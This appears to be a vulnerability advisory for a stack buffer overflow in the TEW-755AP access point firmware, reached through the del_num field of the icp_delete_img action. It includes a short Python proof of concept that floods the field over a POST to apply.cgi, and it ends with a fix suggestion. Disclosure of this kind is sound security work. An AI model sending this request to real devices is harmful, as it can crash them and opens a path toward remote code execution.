We found a stack buffer overflow vulnerability at **TEW-755AP (**Firmware version TEW755AP-FW113B01.bin).

In the handler function for action icp_delete_img (sub_41DEDC) of the file /www/cgi/ssi, the value of del_num is directly copied to stack buffer without size check. An attacker can specify the input as a very long string in the post data and send the POST Request to apply.cgi to overflow the stack buffer, and finally can perform a Remote Code Execution attack.

PoC

import requests

url = "<http://192.168.17.221:80/apply.cgi>"
cookie = {"Cookie":"uid=1234"}
data = { 
    'action' : "icp_delete_img",
    "del_num" : "a" * 0x1000
}
response = requests.post(url, cookies=cookie, data=data)
print(response.text)
print(response)

We use python to send a crafted HTTP post request to the web server, and print out the return message.

Send the crafted HTTP request to the server, it will return 502 error code. This is because the stack buffer is overflowed by the input “aaaaaaaaaaaaaaaaaa…”. If it’s a malicious shellcode then the system will be controlled by the attacker.

Fix Suggestion:

Use snprintf to perform avoid buffer overflow